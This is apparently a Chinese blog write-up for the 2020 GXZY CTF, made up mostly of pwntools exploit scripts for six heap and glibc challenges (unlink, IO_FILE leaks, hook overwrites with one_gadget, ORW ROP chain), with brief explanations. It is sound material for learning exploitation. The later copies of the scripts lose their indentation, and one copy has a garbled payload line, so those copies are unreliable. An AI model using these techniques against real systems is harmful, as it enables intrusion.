2020-03-14

GXZY

XCTF 2020年联合各所高校举办的一场公益CTF比赛,菜鸟全靠后期复现,而且还没有做完,不定期更新

Easy_Heap

由于添加块的时候会直接申请一个0x20大小的块,从而可以通过溢出8个字节的大小控制下一个块的fd,两个方法泄漏libcbase,一个是利用IO_FILE打印IO_stdin的地址,一种是修改free为puts的plt表地址,继而打印某函数的got表内容

from pwn import*
def add(size,content):
	p.sendlineafter('choice:','1')
	p.sendlineafter('How long is this message?',str(size))
	if size >0x400:
		return 0
	p.sendafter('What is the content of the message?',content)
def free(idx):
	p.sendlineafter('choice:','2')
	p.sendlineafter('deleted?',str(idx))
def edit(idx,content):
	p.sendlineafter('choice:','3')
	p.sendlineafter('modified?',str(idx))
	p.sendafter('message?',content)
p = remote('121.36.209.145',9997)
#p = process('./main')
#context.log_level = 'debug'
libc = ELF('libc-2.23.so',checksec=False)
og = [0x45216,0x4526A,0xF02A4,0xF1147]
add(0x18,'FMYY')
add(0x18,'FMYY')
add(0x68,'FMYY')
free(0)
free(1)
add(0x500,'FMYY')
edit(0,p64(0)+p64(0x21)+'\x80')
add(0x18,p64(0x602088))
edit(2,p64(0xF0)+p64(0)*6+p64(0x602080))
edit(0,p64(0xFBAD1800)+p64(0)*3+'\x88')
p.recvline()
libc_base=u64(p.recv(6).ljust(8,'\x00'))-libc.sym['_IO_2_1_stdin_']
libc.address = libc_base
edit(1,p64(libc.sym['__free_hook']))
edit(2,p64(libc_base+og[1]))
free(0)
p.interactive()

from pwn import*
def add(size,content):
	p.sendlineafter('choice:','1')
	p.sendlineafter('How long is this message?',str(size))
	if size >0x400:
		return 0
	p.sendafter('What is the content of the message?',content)
def free(idx):
	p.sendlineafter('choice:','2')
	p.sendlineafter('deleted?',str(idx))
def edit(idx,content):
	p.sendlineafter('choice:','3')
	p.sendlineafter('modified?',str(idx))
	p.sendafter('message?',content)
p = process('./main')
elf = ELF('./main')
context.log_level = 'debug'
libc = ELF('libc-2.23.so',checksec=False)
og = [0x45216,0x4526A,0xF02A4,0xF1147]
add(0x18,'FMYY')
free(0)
add(0x500,'FMYY')
add(0x18,'FMYY')
free(1)
add(0x500,'FMYY')
add(0x18,'FMYY')
edit(1,p64(0) + p64(0x21) + p64(elf.got['free']))
edit(2,p64(0x400670))
edit(1,p64(0) + p64(0x21) + p64(elf.got['puts']))
free(2)
p.recvline()
libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.sym['puts']
libc.address = libc_base
edit(0,p64(0) + p64(0x21) + p64(elf.got['atoi']))
edit(1,p64(libc.sym['system']))
p.sendafter('choice:','/bin/sh\x00')
p.interactive()

下载

MAIN EXPI EXPII LIBC

lgd

堆溢出可以利用unlink,再用orw

from pwn import*
def add(size,text):
	p.sendlineafter('>> ','1')
	p.recvuntil('______?')
	p.sendline(str(size))
	p.recvuntil('yes_or_no?')
	p.send(text)
def free(index):
	p.sendlineafter('>> ','2')
	p.recvuntil('index ?')
	p.sendline(str(index))
def show(index):
	p.sendlineafter('>> ','3')
	p.recvuntil('index ?')
	p.sendline(str(index))
def edit(index,text):
	p.sendlineafter('>> ','4')
	p.recvuntil('index ?')
	p.sendline(str(index))
	p.recvuntil('content ?')
	p.send(text)
p = remote('121.36.209.145',9998)
#context.log_level = 'debug'
elf = ELF('./main')
libc = ELF('./libc-2.23.so')
p.sendlineafter('your name?','FMYY')
add(0x88,'U'*0x89)
add(0x1000-0x10,'U'*0xF0)
add(0x100,'U'*0x100)
unlink =  0x6032E0
payload  = p64(0) + p64(0x81)
payload += p64(unlink - 0x18)
payload += p64(unlink - 0x10)
payload = payload.ljust(0x80,'U')
payload += p64(0x80) + '\x00'
edit(0,payload)
free(1)
edit(0,'\x00'*0x18 +p64(elf.got['read']) + p64(unlink))
show(0)
p.recvline()
libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.sym['read']
log.info('Libc_Base:\t' + hex(libc_base))
libc.address = libc_base
edit(1,p64(unlink) + p64(0x6033E0) + p64(libc.sym['__environ']))
show(2)
p.recvline()
Stack = u64(p.recv(6).ljust(8,'\x00')) -0x228
ROP  = './flag\x00\x00'
ROP += p64(libc.address + 0x021102)
ROP += p64(0x6033E0)
ROP += p64(libc.address + 0x0202E8)
ROP += p64(0)
ROP += p64(libc.symbols['open'])
ROP += p64(libc.address + 0x021102)
ROP += p64(3)
ROP += p64(libc.address + 0x0202E8)
ROP += p64(libc.address + 0x3C6700)
ROP += p64(libc.address + 0x001B92)
ROP += p64(0x100)
ROP += p64(libc.symbols['read'])
ROP += p64(libc.address + 0x021102)
ROP += p64(1)
ROP += p64(libc.address + 0x0202E8)
ROP += p64(libc.address + 0x3C6700)
ROP += p64(libc.address + 0x001B92)
ROP += p64(0x100)
ROP += p64(libc.symbols['write'])
payload  = p64(0x6033E0)
payload += p64(0x4009A9)
edit(1,ROP)
edit(0,p64(Stack))
edit(0,payload)
p.interactive()

下载

MAIN EXP LIBC

woodenbox

首先利用爆破修改main_arena+88最末两个字节然后泄漏libc,然后利用堆块重叠,写malloc_hook为one_gadget

from pwn import*
def add(size,text):
	p.sendlineafter('choice:','1')
	p.sendlineafter('item name:',str(size))
	p.sendafter('item:',text)
def edit(index,size,text):
	p.sendlineafter('choice:','2')
	p.sendlineafter('item:',str(index))
	p.sendlineafter('name:',str(size))
	p.sendafter('item:',text)
def free(index):
	p.sendlineafter('choice:','3')
	p.sendafter('item:',str(index))
p = remote('121.36.215.224',9998)
libc = ELF('./libc-2.23.so',checksec=False)
#context.log_level ='debug'
while True:
	try:
		p = remote('121.36.215.224',9998)
		add(0x10,'\n')
		add(0x10,'\n')
		add(0x58,'\n')
		add(0x68,'\n')
		add(0x20,'\n')
		add(0x10,'\n')
		edit(1,0x20,'\x00'*0x18+p64(0x101))
		free(2)
		free(2)
		add(0x58,'\n')
		add(0x28,'\n')
		edit(0,0x70,'\x00'*0x58+p64(0x71)+'\xDD\x55')
		add(0x68,'\n')
		add(0x68,'\x00'*0x33+p64(0xFBAD1800)+p64(0)*3+'\x88')
		libc_base=u64(p.recv(6).ljust(8,'\x00'))-libc.sym['_IO_2_1_stdin_']
		libc.address=libc_base
		og = [0x45216,0x4526A,0xF02A4,0xF1147]
		add(0x68,'\n')
		free(6)
		edit(0,0x100,'\x00'*0x28+p64(0x71)+p64(libc.sym['__malloc_hook']-0x23))
		add(0x68,'\n')
		add(0x68,'\x00'*0x13+p64(og[2]+libc_base))
		p.sendlineafter('Your choice:','4')
		break
	except:
		p.close()
		continue
p.interactive()

下载

MAIN EXP LIBC

Shotest_Path_v2

利用选择4,覆盖申请空间时的标志为非0值,从而可以利用UAF打印对应地址的FLAG

from pwn import*
#context.log_level ='debug'
def add(idx,length,name,sign):
	p.sendlineafter('---> ','1')
	p.sendlineafter('ID: ',str(idx))
	p.sendlineafter('Price: ','256')
	p.sendlineafter('Length: ',str(length))
	p.sendlineafter(' Name: ',name)
	if sign !=0:
		p.sendlineafter('station: ','20')
		for n in range(21):
			if n +1!= idx:
				p.sendlineafter('station ID: ',str(n+1))
				p.sendlineafter('distance: ','-1')
	else:
		p.sendlineafter('station: ','0')
def free(index):
	p.sendlineafter('---> ','2')
	p.sendlineafter('ID: ',str(index))
def show(index):
	p.sendlineafter('---> ','3')
	p.sendlineafter('ID: ',str(index))
def list(start,end):
	p.sendlineafter('---> ','4')
	p.sendlineafter('Station ID: ',str(start))
	p.sendlineafter('Station ID: ',str(end))

p = process('./main')
add(0,0x20,'FMYY',0)
add(30,0x20,'FMYY',0)
for i in range(21):
    add(i+1,0x10,'FMYY',1)
free(0)
list(1,2)
free(30)
add(29,0x10,p64(0)+p64(0x6068E0),0)
show(0)
p.recvuntil('name: ')
log.info('FLAG:\t'+p.recvuntil('}'))
p.close()

下载

MAIN EXP

musl

musl-libc,一种轻量型的C库文件,首先泄漏libc_base,本地环境调试时vmmap可以知道heap mmap libc等位置,然后利用unlink继而泄漏environ中的栈值，从而利用修改栈数据getshell

from pwn import*
def add(size,content,sign):
	p.sendlineafter('>','1')
	p.sendlineafter('size? >',str(size))
	p.sendlineafter('believer? >',sign)
	p.sendafter('sleeve >',content)
def free(index):
	p.sendlineafter('>','2')
	p.sendlineafter('ID? >',str(index))
def edit(index,content):
	p.sendlineafter('> ','3')
	p.sendlineafter('ID? >',str(index))
	p.send(content)
def show(index):
	p.sendlineafter('>','4')
	p.sendlineafter('ID? >',str(index))
	return p.recvuntil("Done")
#context.log_level ='debug'
p = process('./main')
libc = ELF('libc.so',checksec=False)
add(0x60,'\n','N')	#0
add(0x60,'\n','N')	#1
add(0x60,'\n','N')	#2
add(0x60,'\n','N')	#3
add(0x60,'\n','N')	#4
add(0x60,'\n','N')	#5
free(3)
free(5)
free(1)
payload = "\x00"*0x38+p64(0)*3+p64(0x61)+p64(0x20)+p64(0XDEADBEEF)*2+p64(0x70)+p64(0x81)+'H'*8
add(0x38,payload,'Y')
libc_base = u64(show(4)[8:14].ljust(8,'\x00'))-0x292E38
mmap_base = libc_base + 0x290000
heap_base = libc_base + 0x293000
edit(1,p64(1)+p64(0x71)+p64(mmap_base+0x18-0x18)+p64(mmap_base+0x18-0x10)+"\n")
free(4)
edit(1,p64(mmap_base+0x10)+p64(0x4)+p64(0x602034)+p64(8)+p64(libc_base+libc.sym["environ"])+"\n")
edit(1,p32(0))
environ = u64(show(2)[:6].ljust(8,'\x00'))
pop_rdi_ret = 0x14862
binsh = 0x91345
predict_ret = environ-0x90
edit(0,p64(0x70)+p64(predict_ret)+'\n')
edit(1,p64(libc_base+pop_rdi_ret)+p64(libc_base+binsh)+p64(libc_base+libc.sym["system"]))
p.interactive()

下载

MAIN EXP LIBC

Bjut

盲打题,负数溢出,从-40处可以打印出取得libc_base,然后-16 stderr结构向下溢出改虚表为one_gadget
此题我本地是Kali系统,而Kali的所有one_gadget都不满足条件,所以有条件的还是Ubuntu 19复现
下方所给出的LIBC以及写的EXP都在Kali下所写

from pwn import*
def add(size,content):		#count <=0x10
	p.sendlineafter('>','1')
	p.sendlineafter('The length of your hw:',str(size)) #0<size<0x80
	p.sendafter('Input your hw:',content)
def show(index):
	p.sendlineafter('>','4')
	p.sendlineafter('index of your hw:',str(index))
def free(index):
	p.sendlineafter('>','3')
	p.sendlineafter('index of your hw:',str(index))
def edit(index,content):
	p.sendlineafter('>','2')
	p.sendlineafter('index of your hw:',str(index))
	p.sendafter('Input your hw:',content)
p = process('./main')
context(arch='amd64',os='linux')
#context.log_level ='debug'
show(-40)
p.recvuntil('Your hw:\n')
libc_base = u64(p.recv(0x1D8)[-8:]) - 0x26AD0
log.info(hex(libc_base))
IO_stderr = flat([
0x00000000FBAD2087, libc_base+0x1BA703,
libc_base+0x1BA703,	libc_base+0x1BA703,
libc_base+0x1BA703,	libc_base+0x1BA703,
libc_base+0x1BA703,	libc_base+0x1BA703,
libc_base+0x1BA704,	0x0000000000000000,
0x0000000000000000,	0x0000000000000000,
0x0000000000000000,	libc_base+0x1BA760,
0x0000000000000002,	0xFFFFFFFFFFFFFFFF,
0x0000000000000000,	libc_base+0x1BC570,
0xFFFFFFFFFFFFFFFF,	0x0000000000000000,
libc_base+0x1B9780,	0x0000000000000000,
0x0000000000000000,	0x0000000000000000,
0x0000000000000000,	0x0000000000000000,
0x0000000000000000,	libc_base+0x1BB560])
IO_stdout = IO_stderr
IO_stdout +=flat([
0x00000000FBAD2887,	libc_base+0x1BA7E3,
libc_base+0x1BA7E3,	libc_base+0x1BA7E3,
libc_base+0x1BA7E3,	libc_base+0x1BA7E3,
libc_base+0x1BA7E3,	libc_base+0x1BA7E3,
libc_base+0x1BA7E4,	0x0000000000000000,
0x0000000000000000,	0x0000000000000000,
0x0000000000000000,	libc_base+0x1B9A00,
0x0000000000000001,	0xFFFFFFFFFFFFFFFF,
0x000000003E000000,	libc_base+0x1BC580,
0xFFFFFFFFFFFFFFFF,	0x0000000000000000,
libc_base+0x1B98C0,	0x0000000000000000,
0x0000000000000000,	0x0000000000000000,
0x00000000FFFFFFFF,	0x0000000000000000,
0x0000000000000000,	libc_base+0x1BB560])
payload = IO_stdout
payload += flat([
libc_base+0x1BA680,libc_base+0x1BA760,
libc_base+0x1B9A00,libc_base+0x26E20])
payload += flat([
libc_base+0x16AFE0, libc_base+0x16B040,
libc_base+0x16B070, libc_base+0x16B0D0,
libc_base+0x16B310, libc_base+0x16B4E0,
libc_base+0x16B510, libc_base+0x16B540,
libc_base+0x16B5A0, libc_base+0x91030 ,
libc_base+0x16B6C0, libc_base+0x16B700,
libc_base+0x16B710, libc_base+0x16B780,
libc_base+0xF5FD0 , libc_base+0x16B790,
libc_base+0x16B840, libc_base+0x16B880,
libc_base+0x11A190, libc_base+0x16B8A0,
libc_base+0x16B940, libc_base+0x16B910,
libc_base+0x16B9C0, libc_base+0x129490,
libc_base+0x16B9E0, libc_base+0x16BA10,
libc_base+0x16BA40, libc_base+0x16BA70,
libc_base+0x16BAA0, libc_base+0x16BB50])
payload += p64(0)*4
payload += p64(libc_base+0xC84DA)*16
edit(-16,payload)
p.interactive()

下载

MAIN EXP LIBC

1	from pwn import*
2	def add(size,content):
3	p.sendlineafter('choice:','1')
4	p.sendlineafter('How long is this message?',str(size))
5	if size >0x400:
6	return 0
7	p.sendafter('What is the content of the message?',content)
8	def free(idx):
9	p.sendlineafter('choice:','2')
10	p.sendlineafter('deleted?',str(idx))
11	def edit(idx,content):
12	p.sendlineafter('choice:','3')
13	p.sendlineafter('modified?',str(idx))
14	p.sendafter('message?',content)
15	p = remote('121.36.209.145',9997)
16	#p = process('./main')
17	#context.log_level = 'debug'
18	libc = ELF('libc-2.23.so',checksec=False)
19	og = [0x45216,0x4526A,0xF02A4,0xF1147]
20	add(0x18,'FMYY')
21	add(0x18,'FMYY')
22	add(0x68,'FMYY')
23	free(0)
24	free(1)
25	add(0x500,'FMYY')
26	edit(0,p64(0)+p64(0x21)+'\x80')
27	add(0x18,p64(0x602088))
28	edit(2,p64(0xF0)+p64(0)*6+p64(0x602080))
29	edit(0,p64(0xFBAD1800)+p64(0)*3+'\x88')
30	p.recvline()
31	libc_base=u64(p.recv(6).ljust(8,'\x00'))-libc.sym['_IO_2_1_stdin_']
32	libc.address = libc_base
33	edit(1,p64(libc.sym['__free_hook']))
34	edit(2,p64(libc_base+og[1]))
35	free(0)
36	p.interactive()

1	from pwn import*
2	def add(size,text):
3	p.sendlineafter('>> ','1')
4	p.recvuntil('______?')
5	p.sendline(str(size))
6	p.recvuntil('yes_or_no?')
7	p.send(text)
8	def free(index):
9	p.sendlineafter('>> ','2')
10	p.recvuntil('index ?')
11	p.sendline(str(index))
12	def show(index):
13	p.sendlineafter('>> ','3')
14	p.recvuntil('index ?')
15	p.sendline(str(index))
16	def edit(index,text):
17	p.sendlineafter('>> ','4')
18	p.recvuntil('index ?')
19	p.sendline(str(index))
20	p.recvuntil('content ?')
21	p.send(text)
22	p = remote('121.36.209.145',9998)
23	#context.log_level = 'debug'
24	elf = ELF('./main')
25	libc = ELF('./libc-2.23.so')
26	p.sendlineafter('your name?','FMYY')
27	add(0x88,'U'*0x89)
28	add(0x1000-0x10,'U'*0xF0)
29	add(0x100,'U'*0x100)
30	unlink = 0x6032E0
31	payload = p64(0) + p64(0x81)
32	payload += p64(unlink - 0x18)
33	payload += p64(unlink - 0x10)
34	payload = payload.ljust(0x80,'U')
35	payload += p64(0x80) + '\x00'
36	edit(0,payload)
37	free(1)
38	edit(0,'\x00'*0x18 +p64(elf.got['read']) + p64(unlink))
39	show(0)
40	p.recvline()
41	libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.sym['read']
42	log.info('Libc_Base:\t' + hex(libc_base))
43	libc.address = libc_base
44	edit(1,p64(unlink) + p64(0x6033E0) + p64(libc.sym['__environ']))
45	show(2)
46	p.recvline()
47	Stack = u64(p.recv(6).ljust(8,'\x00')) -0x228
48	ROP = './flag\x00\x00'
49	ROP += p64(libc.address + 0x021102)
50	ROP += p64(0x6033E0)
51	ROP += p64(libc.address + 0x0202E8)
52	ROP += p64(0)
53	ROP += p64(libc.symbols['open'])
54	ROP += p64(libc.address + 0x021102)
55	ROP += p64(3)
56	ROP += p64(libc.address + 0x0202E8)
57	ROP += p64(libc.address + 0x3C6700)
58	ROP += p64(libc.address + 0x001B92)
59	ROP += p64(0x100)
60	ROP += p64(libc.symbols['read'])
61	ROP += p64(libc.address + 0x021102)
62	ROP += p64(1)
63	ROP += p64(libc.address + 0x0202E8)
64	ROP += p64(libc.address + 0x3C6700)
65	ROP += p64(libc.address + 0x001B92)
66	ROP += p64(0x100)
67	ROP += p64(libc.symbols['write'])
68	payload = p64(0x6033E0)
69	payload += p64(0x4009A9)
70	edit(1,ROP)
71	edit(0,p64(Stack))
72	edit(0,payload)
73	p.interactive()

1	from pwn import*
2	#context.log_level ='debug'
3	def add(idx,length,name,sign):
4	p.sendlineafter('---> ','1')
5	p.sendlineafter('ID: ',str(idx))
6	p.sendlineafter('Price: ','256')
7	p.sendlineafter('Length: ',str(length))
8	p.sendlineafter(' Name: ',name)
9	if sign !=0:
10	p.sendlineafter('station: ','20')
11	for n in range(21):
12	if n +1!= idx:
13	p.sendlineafter('station ID: ',str(n+1))
14	p.sendlineafter('distance: ','-1')
15	else:
16	p.sendlineafter('station: ','0')
17	def free(index):
18	p.sendlineafter('---> ','2')
19	p.sendlineafter('ID: ',str(index))
20	def show(index):
21	p.sendlineafter('---> ','3')
22	p.sendlineafter('ID: ',str(index))
23	def list(start,end):
24	p.sendlineafter('---> ','4')
25	p.sendlineafter('Station ID: ',str(start))
26	p.sendlineafter('Station ID: ',str(end))
27
28	p = process('./main')
29	add(0,0x20,'FMYY',0)
30	add(30,0x20,'FMYY',0)
31	for i in range(21):
32	add(i+1,0x10,'FMYY',1)
33	free(0)
34	list(1,2)
35	free(30)
36	add(29,0x10,p64(0)+p64(0x6068E0),0)
37	show(0)
38	p.recvuntil('name: ')
39	log.info('FLAG:\t'+p.recvuntil('}'))
40	p.close()

1	from pwn import*
2	def add(size,content,sign):
3	p.sendlineafter('>','1')
4	p.sendlineafter('size? >',str(size))
5	p.sendlineafter('believer? >',sign)
6	p.sendafter('sleeve >',content)
7	def free(index):
8	p.sendlineafter('>','2')
9	p.sendlineafter('ID? >',str(index))
10	def edit(index,content):
11	p.sendlineafter('> ','3')
12	p.sendlineafter('ID? >',str(index))
13	p.send(content)
14	def show(index):
15	p.sendlineafter('>','4')
16	p.sendlineafter('ID? >',str(index))
17	return p.recvuntil("Done")
18	#context.log_level ='debug'
19	p = process('./main')
20	libc = ELF('libc.so',checksec=False)
21	add(0x60,'\n','N') #0
22	add(0x60,'\n','N') #1
23	add(0x60,'\n','N') #2
24	add(0x60,'\n','N') #3
25	add(0x60,'\n','N') #4
26	add(0x60,'\n','N') #5
27	free(3)
28	free(5)
29	free(1)
30	payload = "\x00"0x38+p64(0)3+p64(0x61)+p64(0x20)+p64(0XDEADBEEF)2+p64(0x70)+p64(0x81)+'H'8
31	add(0x38,payload,'Y')
32	libc_base = u64(show(4)[8:14].ljust(8,'\x00'))-0x292E38
33	mmap_base = libc_base + 0x290000
34	heap_base = libc_base + 0x293000
35	edit(1,p64(1)+p64(0x71)+p64(mmap_base+0x18-0x18)+p64(mmap_base+0x18-0x10)+"\n")
36	free(4)
37	edit(1,p64(mmap_base+0x10)+p64(0x4)+p64(0x602034)+p64(8)+p64(libc_base+libc.sym["environ"])+"\n")
38	edit(1,p32(0))
39	environ = u64(show(2)[:6].ljust(8,'\x00'))
40	pop_rdi_ret = 0x14862
41	binsh = 0x91345
42	predict_ret = environ-0x90
43	edit(0,p64(0x70)+p64(predict_ret)+'\n')
44	edit(1,p64(libc_base+pop_rdi_ret)+p64(libc_base+binsh)+p64(libc_base+libc.sym["system"]))
45	p.interactive()

1	from pwn import*
2	def add(size,content): #count <=0x10
3	p.sendlineafter('>','1')
4	p.sendlineafter('The length of your hw:',str(size)) #0<size<0x80
5	p.sendafter('Input your hw:',content)
6	def show(index):
7	p.sendlineafter('>','4')
8	p.sendlineafter('index of your hw:',str(index))
9	def free(index):
10	p.sendlineafter('>','3')
11	p.sendlineafter('index of your hw:',str(index))
12	def edit(index,content):
13	p.sendlineafter('>','2')
14	p.sendlineafter('index of your hw:',str(index))
15	p.sendafter('Input your hw:',content)
16	p = process('./main')
17	context(arch='amd64',os='linux')
18	#context.log_level ='debug'
19	show(-40)
20	p.recvuntil('Your hw:\n')
21	libc_base = u64(p.recv(0x1D8)[-8:]) - 0x26AD0
22	log.info(hex(libc_base))
23	IO_stderr = flat([
24	0x00000000FBAD2087, libc_base+0x1BA703,
25	libc_base+0x1BA703, libc_base+0x1BA703,
26	libc_base+0x1BA703, libc_base+0x1BA703,
27	libc_base+0x1BA703, libc_base+0x1BA703,
28	libc_base+0x1BA704, 0x0000000000000000,
29	0x0000000000000000, 0x0000000000000000,
30	0x0000000000000000, libc_base+0x1BA760,
31	0x0000000000000002, 0xFFFFFFFFFFFFFFFF,
32	0x0000000000000000, libc_base+0x1BC570,
33	0xFFFFFFFFFFFFFFFF, 0x0000000000000000,
34	libc_base+0x1B9780, 0x0000000000000000,
35	0x0000000000000000, 0x0000000000000000,
36	0x0000000000000000, 0x0000000000000000,
37	0x0000000000000000, libc_base+0x1BB560])
38	IO_stdout = IO_stderr
39	IO_stdout +=flat([
40	0x00000000FBAD2887, libc_base+0x1BA7E3,
41	libc_base+0x1BA7E3, libc_base+0x1BA7E3,
42	libc_base+0x1BA7E3, libc_base+0x1BA7E3,
43	libc_base+0x1BA7E3, libc_base+0x1BA7E3,
44	libc_base+0x1BA7E4, 0x0000000000000000,
45	0x0000000000000000, 0x0000000000000000,
46	0x0000000000000000, libc_base+0x1B9A00,
47	0x0000000000000001, 0xFFFFFFFFFFFFFFFF,
48	0x000000003E000000, libc_base+0x1BC580,
49	0xFFFFFFFFFFFFFFFF, 0x0000000000000000,
50	libc_base+0x1B98C0, 0x0000000000000000,
51	0x0000000000000000, 0x0000000000000000,
52	0x00000000FFFFFFFF, 0x0000000000000000,
53	0x0000000000000000, libc_base+0x1BB560])
54	payload = IO_stdout
55	payload += flat([
56	libc_base+0x1BA680,libc_base+0x1BA760,
57	libc_base+0x1B9A00,libc_base+0x26E20])
58	payload += flat([
59	libc_base+0x16AFE0, libc_base+0x16B040,
60	libc_base+0x16B070, libc_base+0x16B0D0,
61	libc_base+0x16B310, libc_base+0x16B4E0,
62	libc_base+0x16B510, libc_base+0x16B540,
63	libc_base+0x16B5A0, libc_base+0x91030 ,
64	libc_base+0x16B6C0, libc_base+0x16B700,
65	libc_base+0x16B710, libc_base+0x16B780,
66	libc_base+0xF5FD0 , libc_base+0x16B790,
67	libc_base+0x16B840, libc_base+0x16B880,
68	libc_base+0x11A190, libc_base+0x16B8A0,
69	libc_base+0x16B940, libc_base+0x16B910,
70	libc_base+0x16B9C0, libc_base+0x129490,
71	libc_base+0x16B9E0, libc_base+0x16BA10,
72	libc_base+0x16BA40, libc_base+0x16BA70,
73	libc_base+0x16BAA0, libc_base+0x16BB50])
74	payload += p64(0)*4
75	payload += p64(libc_base+0xC84DA)*16
76	edit(-16,payload)
77	p.interactive()